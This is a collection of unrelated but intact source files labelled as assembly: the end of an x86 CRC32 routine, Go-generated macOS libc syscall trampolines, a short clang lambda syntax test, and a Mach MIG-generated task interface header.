mov ecx,Arg3 ; 3rd arg: extent len
not eax ;> c = ~crc;
test ecx,ecx
IFNDEF NO_UNROLLED_LOOPS
jz bail
IFNDEF NO_32_BIT_LOADS
align_loop:
test esi,3 ; align buf pointer on next
jz SHORT aligned_now ; dword boundary
Do_CRC_byte
dec ecx
jnz align_loop
aligned_now:
ENDIF ; !NO_32_BIT_LOADS
mov SavLen,ecx ; save current len for later
shr ecx,4 ; ecx = len / 16
jz No_Sixteens
IFNDEF NO_ALIGN
; align loop head at start of 486 internal cache line !!
align 16
ENDIF
Next_Sixteen:
IFNDEF NO_32_BIT_LOADS
Do_CRC_4dword
ELSE ; NO_32_BIT_LOADS
Do_CRC_byteof 0
Do_CRC_byteof 1
Do_CRC_byteof 2
Do_CRC_byteof 3
Do_CRC_byteof 4
Do_CRC_byteof 5
Do_CRC_byteof 6
Do_CRC_byteof 7
Do_CRC_byteof 8
Do_CRC_byteof 9
Do_CRC_byteof 10
Do_CRC_byteof 11
Do_CRC_byteof 12
Do_CRC_byteof 13
Do_CRC_byteof 14
Do_CRC_byteof 15
add esi, 16 ; buf += 16
ENDIF ; ?NO_32_BIT_LOADS
dec ecx
jnz Next_Sixteen
No_Sixteens:
mov ecx,SavLen
and ecx,00000000FH ; ecx = len % 16
IFNDEF NO_32_BIT_LOADS
shr ecx,2 ; ecx = len / 4
jz SHORT No_Fours
Next_Four:
Do_CRC_dword
dec ecx
jnz Next_Four
No_Fours:
mov ecx,SavLen
and ecx,000000003H ; ecx = len % 4
ENDIF ; !NO_32_BIT_LOADS
ENDIF ; !NO_UNROLLED_LOOPS
jz SHORT bail ;> if (len)
IFNDEF NO_ALIGN
; align loop head at start of 486 internal cache line !!
align 16
ENDIF
loupe: ;> do {
Do_CRC_byte ; c = CRC32(c,*buf++,crctab);
dec ecx ;> } while (--len);
jnz loupe
bail: ;> }
not eax ;> return ~c;
fine:
pop ecx
pop edx
pop ebx
pop esi
pop edi
STD_LEAVE
ret
_crc32 endp
_TEXT ends
;
ENDIF ; !CRC_TABLE_ONLY
ENDIF ; !USE_ZLIB
;
end
| {
"language": "Assembly"
} |
// go run mkasm_darwin.go amd64
// Code generated by the command above; DO NOT EDIT.
// +build go1.12
#include "textflag.h"
TEXT ·libc_getgroups_trampoline(SB),NOSPLIT,$0-0
JMP libc_getgroups(SB)
TEXT ·libc_setgroups_trampoline(SB),NOSPLIT,$0-0
JMP libc_setgroups(SB)
TEXT ·libc_wait4_trampoline(SB),NOSPLIT,$0-0
JMP libc_wait4(SB)
TEXT ·libc_accept_trampoline(SB),NOSPLIT,$0-0
JMP libc_accept(SB)
TEXT ·libc_bind_trampoline(SB),NOSPLIT,$0-0
JMP libc_bind(SB)
TEXT ·libc_connect_trampoline(SB),NOSPLIT,$0-0
JMP libc_connect(SB)
TEXT ·libc_socket_trampoline(SB),NOSPLIT,$0-0
JMP libc_socket(SB)
TEXT ·libc_getsockopt_trampoline(SB),NOSPLIT,$0-0
JMP libc_getsockopt(SB)
TEXT ·libc_setsockopt_trampoline(SB),NOSPLIT,$0-0
JMP libc_setsockopt(SB)
TEXT ·libc_getpeername_trampoline(SB),NOSPLIT,$0-0
JMP libc_getpeername(SB)
TEXT ·libc_getsockname_trampoline(SB),NOSPLIT,$0-0
JMP libc_getsockname(SB)
TEXT ·libc_shutdown_trampoline(SB),NOSPLIT,$0-0
JMP libc_shutdown(SB)
TEXT ·libc_socketpair_trampoline(SB),NOSPLIT,$0-0
JMP libc_socketpair(SB)
TEXT ·libc_recvfrom_trampoline(SB),NOSPLIT,$0-0
JMP libc_recvfrom(SB)
TEXT ·libc_sendto_trampoline(SB),NOSPLIT,$0-0
JMP libc_sendto(SB)
TEXT ·libc_recvmsg_trampoline(SB),NOSPLIT,$0-0
JMP libc_recvmsg(SB)
TEXT ·libc_sendmsg_trampoline(SB),NOSPLIT,$0-0
JMP libc_sendmsg(SB)
TEXT ·libc_kevent_trampoline(SB),NOSPLIT,$0-0
JMP libc_kevent(SB)
TEXT ·libc_utimes_trampoline(SB),NOSPLIT,$0-0
JMP libc_utimes(SB)
TEXT ·libc_futimes_trampoline(SB),NOSPLIT,$0-0
JMP libc_futimes(SB)
TEXT ·libc_poll_trampoline(SB),NOSPLIT,$0-0
JMP libc_poll(SB)
TEXT ·libc_madvise_trampoline(SB),NOSPLIT,$0-0
JMP libc_madvise(SB)
TEXT ·libc_mlock_trampoline(SB),NOSPLIT,$0-0
JMP libc_mlock(SB)
TEXT ·libc_mlockall_trampoline(SB),NOSPLIT,$0-0
JMP libc_mlockall(SB)
TEXT ·libc_mprotect_trampoline(SB),NOSPLIT,$0-0
JMP libc_mprotect(SB)
TEXT ·libc_msync_trampoline(SB),NOSPLIT,$0-0
JMP libc_msync(SB)
TEXT ·libc_munlock_trampoline(SB),NOSPLIT,$0-0
JMP libc_munlock(SB)
TEXT ·libc_munlockall_trampoline(SB),NOSPLIT,$0-0
JMP libc_munlockall(SB)
TEXT ·libc_getattrlist_trampoline(SB),NOSPLIT,$0-0
JMP libc_getattrlist(SB)
TEXT ·libc_pipe_trampoline(SB),NOSPLIT,$0-0
JMP libc_pipe(SB)
TEXT ·libc_getxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_getxattr(SB)
TEXT ·libc_fgetxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_fgetxattr(SB)
TEXT ·libc_setxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_setxattr(SB)
TEXT ·libc_fsetxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_fsetxattr(SB)
TEXT ·libc_removexattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_removexattr(SB)
TEXT ·libc_fremovexattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_fremovexattr(SB)
TEXT ·libc_listxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_listxattr(SB)
TEXT ·libc_flistxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_flistxattr(SB)
TEXT ·libc_setattrlist_trampoline(SB),NOSPLIT,$0-0
JMP libc_setattrlist(SB)
TEXT ·libc_fcntl_trampoline(SB),NOSPLIT,$0-0
JMP libc_fcntl(SB)
TEXT ·libc_kill_trampoline(SB),NOSPLIT,$0-0
JMP libc_kill(SB)
TEXT ·libc_ioctl_trampoline(SB),NOSPLIT,$0-0
JMP libc_ioctl(SB)
TEXT ·libc_sysctl_trampoline(SB),NOSPLIT,$0-0
JMP libc_sysctl(SB)
TEXT ·libc_sendfile_trampoline(SB),NOSPLIT,$0-0
JMP libc_sendfile(SB)
TEXT ·libc_access_trampoline(SB),NOSPLIT,$0-0
JMP libc_access(SB)
TEXT ·libc_adjtime_trampoline(SB),NOSPLIT,$0-0
JMP libc_adjtime(SB)
TEXT ·libc_chdir_trampoline(SB),NOSPLIT,$0-0
JMP libc_chdir(SB)
TEXT ·libc_chflags_trampoline(SB),NOSPLIT,$0-0
JMP libc_chflags(SB)
TEXT ·libc_chmod_trampoline(SB),NOSPLIT,$0-0
JMP libc_chmod(SB)
TEXT ·libc_chown_trampoline(SB),NOSPLIT,$0-0
JMP libc_chown(SB)
TEXT ·libc_chroot_trampoline(SB),NOSPLIT,$0-0
JMP libc_chroot(SB)
TEXT ·libc_clock_gettime_trampoline(SB),NOSPLIT,$0-0
JMP libc_clock_gettime(SB)
TEXT ·libc_close_trampoline(SB),NOSPLIT,$0-0
JMP libc_close(SB)
TEXT ·libc_dup_trampoline(SB),NOSPLIT,$0-0
JMP libc_dup(SB)
TEXT ·libc_dup2_trampoline(SB),NOSPLIT,$0-0
JMP libc_dup2(SB)
TEXT ·libc_exchangedata_trampoline(SB),NOSPLIT,$0-0
JMP libc_exchangedata(SB)
TEXT ·libc_exit_trampoline(SB),NOSPLIT,$0-0
JMP libc_exit(SB)
TEXT ·libc_faccessat_trampoline(SB),NOSPLIT,$0-0
JMP libc_faccessat(SB)
TEXT ·libc_fchdir_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchdir(SB)
TEXT ·libc_fchflags_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchflags(SB)
TEXT ·libc_fchmod_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchmod(SB)
TEXT ·libc_fchmodat_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchmodat(SB)
TEXT ·libc_fchown_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchown(SB)
TEXT ·libc_fchownat_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchownat(SB)
TEXT ·libc_flock_trampoline(SB),NOSPLIT,$0-0
JMP libc_flock(SB)
TEXT ·libc_fpathconf_trampoline(SB),NOSPLIT,$0-0
JMP libc_fpathconf(SB)
TEXT ·libc_fsync_trampoline(SB),NOSPLIT,$0-0
JMP libc_fsync(SB)
TEXT ·libc_ftruncate_trampoline(SB),NOSPLIT,$0-0
JMP libc_ftruncate(SB)
TEXT ·libc_getdtablesize_trampoline(SB),NOSPLIT,$0-0
JMP libc_getdtablesize(SB)
TEXT ·libc_getegid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getegid(SB)
TEXT ·libc_geteuid_trampoline(SB),NOSPLIT,$0-0
JMP libc_geteuid(SB)
TEXT ·libc_getgid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getgid(SB)
TEXT ·libc_getpgid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getpgid(SB)
TEXT ·libc_getpgrp_trampoline(SB),NOSPLIT,$0-0
JMP libc_getpgrp(SB)
TEXT ·libc_getpid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getpid(SB)
TEXT ·libc_getppid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getppid(SB)
TEXT ·libc_getpriority_trampoline(SB),NOSPLIT,$0-0
JMP libc_getpriority(SB)
TEXT ·libc_getrlimit_trampoline(SB),NOSPLIT,$0-0
JMP libc_getrlimit(SB)
TEXT ·libc_getrusage_trampoline(SB),NOSPLIT,$0-0
JMP libc_getrusage(SB)
TEXT ·libc_getsid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getsid(SB)
TEXT ·libc_getuid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getuid(SB)
TEXT ·libc_issetugid_trampoline(SB),NOSPLIT,$0-0
JMP libc_issetugid(SB)
TEXT ·libc_kqueue_trampoline(SB),NOSPLIT,$0-0
JMP libc_kqueue(SB)
TEXT ·libc_lchown_trampoline(SB),NOSPLIT,$0-0
JMP libc_lchown(SB)
TEXT ·libc_link_trampoline(SB),NOSPLIT,$0-0
JMP libc_link(SB)
TEXT ·libc_linkat_trampoline(SB),NOSPLIT,$0-0
JMP libc_linkat(SB)
TEXT ·libc_listen_trampoline(SB),NOSPLIT,$0-0
JMP libc_listen(SB)
TEXT ·libc_mkdir_trampoline(SB),NOSPLIT,$0-0
JMP libc_mkdir(SB)
TEXT ·libc_mkdirat_trampoline(SB),NOSPLIT,$0-0
JMP libc_mkdirat(SB)
TEXT ·libc_mkfifo_trampoline(SB),NOSPLIT,$0-0
JMP libc_mkfifo(SB)
TEXT ·libc_mknod_trampoline(SB),NOSPLIT,$0-0
JMP libc_mknod(SB)
TEXT ·libc_open_trampoline(SB),NOSPLIT,$0-0
JMP libc_open(SB)
TEXT ·libc_openat_trampoline(SB),NOSPLIT,$0-0
JMP libc_openat(SB)
TEXT ·libc_pathconf_trampoline(SB),NOSPLIT,$0-0
JMP libc_pathconf(SB)
TEXT ·libc_pread_trampoline(SB),NOSPLIT,$0-0
JMP libc_pread(SB)
TEXT ·libc_pwrite_trampoline(SB),NOSPLIT,$0-0
JMP libc_pwrite(SB)
TEXT ·libc_read_trampoline(SB),NOSPLIT,$0-0
JMP libc_read(SB)
TEXT ·libc_readlink_trampoline(SB),NOSPLIT,$0-0
JMP libc_readlink(SB)
TEXT ·libc_readlinkat_trampoline(SB),NOSPLIT,$0-0
JMP libc_readlinkat(SB)
TEXT ·libc_rename_trampoline(SB),NOSPLIT,$0-0
JMP libc_rename(SB)
TEXT ·libc_renameat_trampoline(SB),NOSPLIT,$0-0
JMP libc_renameat(SB)
TEXT ·libc_revoke_trampoline(SB),NOSPLIT,$0-0
JMP libc_revoke(SB)
TEXT ·libc_rmdir_trampoline(SB),NOSPLIT,$0-0
JMP libc_rmdir(SB)
TEXT ·libc_lseek_trampoline(SB),NOSPLIT,$0-0
JMP libc_lseek(SB)
TEXT ·libc_select_trampoline(SB),NOSPLIT,$0-0
JMP libc_select(SB)
TEXT ·libc_setegid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setegid(SB)
TEXT ·libc_seteuid_trampoline(SB),NOSPLIT,$0-0
JMP libc_seteuid(SB)
TEXT ·libc_setgid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setgid(SB)
TEXT ·libc_setlogin_trampoline(SB),NOSPLIT,$0-0
JMP libc_setlogin(SB)
TEXT ·libc_setpgid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setpgid(SB)
TEXT ·libc_setpriority_trampoline(SB),NOSPLIT,$0-0
JMP libc_setpriority(SB)
TEXT ·libc_setprivexec_trampoline(SB),NOSPLIT,$0-0
JMP libc_setprivexec(SB)
TEXT ·libc_setregid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setregid(SB)
TEXT ·libc_setreuid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setreuid(SB)
TEXT ·libc_setrlimit_trampoline(SB),NOSPLIT,$0-0
JMP libc_setrlimit(SB)
TEXT ·libc_setsid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setsid(SB)
TEXT ·libc_settimeofday_trampoline(SB),NOSPLIT,$0-0
JMP libc_settimeofday(SB)
TEXT ·libc_setuid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setuid(SB)
TEXT ·libc_symlink_trampoline(SB),NOSPLIT,$0-0
JMP libc_symlink(SB)
TEXT ·libc_symlinkat_trampoline(SB),NOSPLIT,$0-0
JMP libc_symlinkat(SB)
TEXT ·libc_sync_trampoline(SB),NOSPLIT,$0-0
JMP libc_sync(SB)
TEXT ·libc_truncate_trampoline(SB),NOSPLIT,$0-0
JMP libc_truncate(SB)
TEXT ·libc_umask_trampoline(SB),NOSPLIT,$0-0
JMP libc_umask(SB)
TEXT ·libc_undelete_trampoline(SB),NOSPLIT,$0-0
JMP libc_undelete(SB)
TEXT ·libc_unlink_trampoline(SB),NOSPLIT,$0-0
JMP libc_unlink(SB)
TEXT ·libc_unlinkat_trampoline(SB),NOSPLIT,$0-0
JMP libc_unlinkat(SB)
TEXT ·libc_unmount_trampoline(SB),NOSPLIT,$0-0
JMP libc_unmount(SB)
TEXT ·libc_write_trampoline(SB),NOSPLIT,$0-0
JMP libc_write(SB)
TEXT ·libc_mmap_trampoline(SB),NOSPLIT,$0-0
JMP libc_mmap(SB)
TEXT ·libc_munmap_trampoline(SB),NOSPLIT,$0-0
JMP libc_munmap(SB)
TEXT ·libc_ptrace_trampoline(SB),NOSPLIT,$0-0
JMP libc_ptrace(SB)
TEXT ·libc_gettimeofday_trampoline(SB),NOSPLIT,$0-0
JMP libc_gettimeofday(SB)
TEXT ·libc_fstat64_trampoline(SB),NOSPLIT,$0-0
JMP libc_fstat64(SB)
TEXT ·libc_fstatat64_trampoline(SB),NOSPLIT,$0-0
JMP libc_fstatat64(SB)
TEXT ·libc_fstatfs64_trampoline(SB),NOSPLIT,$0-0
JMP libc_fstatfs64(SB)
TEXT ·libc_getfsstat64_trampoline(SB),NOSPLIT,$0-0
JMP libc_getfsstat64(SB)
TEXT ·libc_lstat64_trampoline(SB),NOSPLIT,$0-0
JMP libc_lstat64(SB)
TEXT ·libc_stat64_trampoline(SB),NOSPLIT,$0-0
JMP libc_stat64(SB)
TEXT ·libc_statfs64_trampoline(SB),NOSPLIT,$0-0
JMP libc_statfs64(SB)
| {
"language": "Assembly"
} |
// RUN: %clang_cc1 -fsyntax-only -Wno-unused-value -verify %s
// RUN: %clang_cc1 -fsyntax-only -Wno-unused-value -verify -std=c++98 %s
// RUN: %clang_cc1 -fsyntax-only -Wno-unused-value -verify -std=c++11 %s
int main() {
[]{};
#if __cplusplus <= 199711L
// expected-error@-2 {{expected expression}}
#else
// expected-no-diagnostics
#endif
}
| {
"language": "Assembly"
} |
#ifndef _task_user_
#define _task_user_
/* Module task */
#include <string.h>
#include <mach/ndr.h>
#include <mach/boolean.h>
#include <mach/kern_return.h>
#include <mach/notify.h>
#include <mach/mach_types.h>
#include <mach/message.h>
#include <mach/mig_errors.h>
#include <mach/port.h>
#ifdef AUTOTEST
#ifndef FUNCTION_PTR_T
#define FUNCTION_PTR_T
typedef void (*function_ptr_t)(mach_port_t, char *, mach_msg_type_number_t);
typedef struct {
char *name;
function_ptr_t function;
} function_table_entry;
typedef function_table_entry *function_table_t;
#endif /* FUNCTION_PTR_T */
#endif /* AUTOTEST */
#ifndef task_MSG_COUNT
#define task_MSG_COUNT 35
#endif /* task_MSG_COUNT */
#include <mach/std_types.h>
#include <mach/mig.h>
#include <mach/mig.h>
#include <mach/mach_types.h>
#ifdef __BeforeMigUserHeader
__BeforeMigUserHeader
#endif /* __BeforeMigUserHeader */
#include <sys/cdefs.h>
__BEGIN_DECLS
/* Routine task_create */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_create
(
task_t target_task,
ledger_array_t ledgers,
mach_msg_type_number_t ledgersCnt,
boolean_t inherit_memory,
task_t *child_task
);
/* Routine task_terminate */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_terminate
(
task_t target_task
);
/* Routine task_threads */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_threads
(
task_t target_task,
thread_act_array_t *act_list,
mach_msg_type_number_t *act_listCnt
);
/* Routine mach_ports_register */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t mach_ports_register
(
task_t target_task,
mach_port_array_t init_port_set,
mach_msg_type_number_t init_port_setCnt
);
/* Routine mach_ports_lookup */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t mach_ports_lookup
(
task_t target_task,
mach_port_array_t *init_port_set,
mach_msg_type_number_t *init_port_setCnt
);
/* Routine task_info */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_info
(
task_name_t target_task,
task_flavor_t flavor,
task_info_t task_info_out,
mach_msg_type_number_t *task_info_outCnt
);
/* Routine task_set_info */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_set_info
(
task_t target_task,
task_flavor_t flavor,
task_info_t task_info_in,
mach_msg_type_number_t task_info_inCnt
);
/* Routine task_suspend */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_suspend
(
task_t target_task
);
/* Routine task_resume */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_resume
(
task_t target_task
);
/* Routine task_get_special_port */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_get_special_port
(
task_t task,
int which_port,
mach_port_t *special_port
);
/* Routine task_set_special_port */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_set_special_port
(
task_t task,
int which_port,
mach_port_t special_port
);
/* Routine thread_create */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t thread_create
(
task_t parent_task,
thread_act_t *child_act
);
/* Routine thread_create_running */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t thread_create_running
(
task_t parent_task,
thread_state_flavor_t flavor,
thread_state_t new_state,
mach_msg_type_number_t new_stateCnt,
thread_act_t *child_act
);
/* Routine task_set_exception_ports */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_set_exception_ports
(
task_t task,
exception_mask_t exception_mask,
mach_port_t new_port,
exception_behavior_t behavior,
thread_state_flavor_t new_flavor
);
/* Routine task_get_exception_ports */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_get_exception_ports
(
task_t task,
exception_mask_t exception_mask,
exception_mask_array_t masks,
mach_msg_type_number_t *masksCnt,
exception_handler_array_t old_handlers,
exception_behavior_array_t old_behaviors,
exception_flavor_array_t old_flavors
);
/* Routine task_swap_exception_ports */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_swap_exception_ports
(
task_t task,
exception_mask_t exception_mask,
mach_port_t new_port,
exception_behavior_t behavior,
thread_state_flavor_t new_flavor,
exception_mask_array_t masks,
mach_msg_type_number_t *masksCnt,
exception_handler_array_t old_handlerss,
exception_behavior_array_t old_behaviors,
exception_flavor_array_t old_flavors
);
/* Routine lock_set_create */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t lock_set_create
(
task_t task,
lock_set_t *new_lock_set,
int n_ulocks,
int policy
);
/* Routine lock_set_destroy */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t lock_set_destroy
(
task_t task,
lock_set_t lock_set
);
/* Routine semaphore_create */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t semaphore_create
(
task_t task,
semaphore_t *semaphore,
int policy,
int value
);
/* Routine semaphore_destroy */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t semaphore_destroy
(
task_t task,
semaphore_t semaphore
);
/* Routine task_policy_set */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_policy_set
(
task_t task,
task_policy_flavor_t flavor,
task_policy_t policy_info,
mach_msg_type_number_t policy_infoCnt
);
/* Routine task_policy_get */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_policy_get
(
task_t task,
task_policy_flavor_t flavor,
task_policy_t policy_info,
mach_msg_type_number_t *policy_infoCnt,
boolean_t *get_default
);
/* Routine task_sample */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_sample
(
task_t task,
mach_port_t reply
);
/* Routine task_policy */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_policy
(
task_t task,
policy_t policy,
policy_base_t base,
mach_msg_type_number_t baseCnt,
boolean_t set_limit,
boolean_t change
);
/* Routine task_set_emulation */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_set_emulation
(
task_t target_port,
vm_address_t routine_entry_pt,
int routine_number
);
/* Routine task_get_emulation_vector */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_get_emulation_vector
(
task_t task,
int *vector_start,
emulation_vector_t *emulation_vector,
mach_msg_type_number_t *emulation_vectorCnt
);
/* Routine task_set_emulation_vector */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_set_emulation_vector
(
task_t task,
int vector_start,
emulation_vector_t emulation_vector,
mach_msg_type_number_t emulation_vectorCnt
);
/* Routine task_set_ras_pc */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_set_ras_pc
(
task_t target_task,
vm_address_t basepc,
vm_address_t boundspc
);
/* Routine task_assign */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_assign
(
task_t task,
processor_set_t new_set,
boolean_t assign_threads
);
/* Routine task_assign_default */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_assign_default
(
task_t task,
boolean_t assign_threads
);
/* Routine task_get_assignment */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_get_assignment
(
task_t task,
processor_set_name_t *assigned_set
);
/* Routine task_set_policy */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_set_policy
(
task_t task,
processor_set_t pset,
policy_t policy,
policy_base_t base,
mach_msg_type_number_t baseCnt,
policy_limit_t limit,
mach_msg_type_number_t limitCnt,
boolean_t change
);
/* Routine task_get_state */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_get_state
(
task_t task,
thread_state_flavor_t flavor,
thread_state_t old_state,
mach_msg_type_number_t *old_stateCnt
);
/* Routine task_set_state */
#ifdef mig_external
mig_external
#else
extern
#endif /* mig_external */
kern_return_t task_set_state
(
task_t task,
thread_state_flavor_t flavor,
thread_state_t new_state,
mach_msg_type_number_t new_stateCnt
);
__END_DECLS
/********************** Caution **************************/
/* The following data types should be used to calculate */
/* maximum message sizes only. The actual message may be */
/* smaller, and the position of the arguments within the */
/* message layout may vary from what is presented here. */
/* For example, if any of the arguments are variable- */
/* sized, and less than the maximum is sent, the data */
/* will be packed tight in the actual message to reduce */
/* the presence of holes. */
/********************** Caution **************************/
/* typedefs for all requests */
#ifndef __Request__task_subsystem__defined
#define __Request__task_subsystem__defined
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_ool_ports_descriptor_t ledgers;
/* end of the kernel processed data */
NDR_record_t NDR;
mach_msg_type_number_t ledgersCnt;
boolean_t inherit_memory;
} __Request__task_create_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
} __Request__task_terminate_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
} __Request__task_threads_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_ool_ports_descriptor_t init_port_set;
/* end of the kernel processed data */
NDR_record_t NDR;
mach_msg_type_number_t init_port_setCnt;
} __Request__mach_ports_register_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
} __Request__mach_ports_lookup_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
task_flavor_t flavor;
mach_msg_type_number_t task_info_outCnt;
} __Request__task_info_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
task_flavor_t flavor;
mach_msg_type_number_t task_info_inCnt;
integer_t task_info_in[10];
} __Request__task_set_info_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
} __Request__task_suspend_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
} __Request__task_resume_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
int which_port;
} __Request__task_get_special_port_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_port_descriptor_t special_port;
/* end of the kernel processed data */
NDR_record_t NDR;
int which_port;
} __Request__task_set_special_port_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
} __Request__thread_create_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
thread_state_flavor_t flavor;
mach_msg_type_number_t new_stateCnt;
natural_t new_state[144];
} __Request__thread_create_running_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_port_descriptor_t new_port;
/* end of the kernel processed data */
NDR_record_t NDR;
exception_mask_t exception_mask;
exception_behavior_t behavior;
thread_state_flavor_t new_flavor;
} __Request__task_set_exception_ports_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
exception_mask_t exception_mask;
} __Request__task_get_exception_ports_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_port_descriptor_t new_port;
/* end of the kernel processed data */
NDR_record_t NDR;
exception_mask_t exception_mask;
exception_behavior_t behavior;
thread_state_flavor_t new_flavor;
} __Request__task_swap_exception_ports_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
int n_ulocks;
int policy;
} __Request__lock_set_create_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_port_descriptor_t lock_set;
/* end of the kernel processed data */
} __Request__lock_set_destroy_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
int policy;
int value;
} __Request__semaphore_create_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
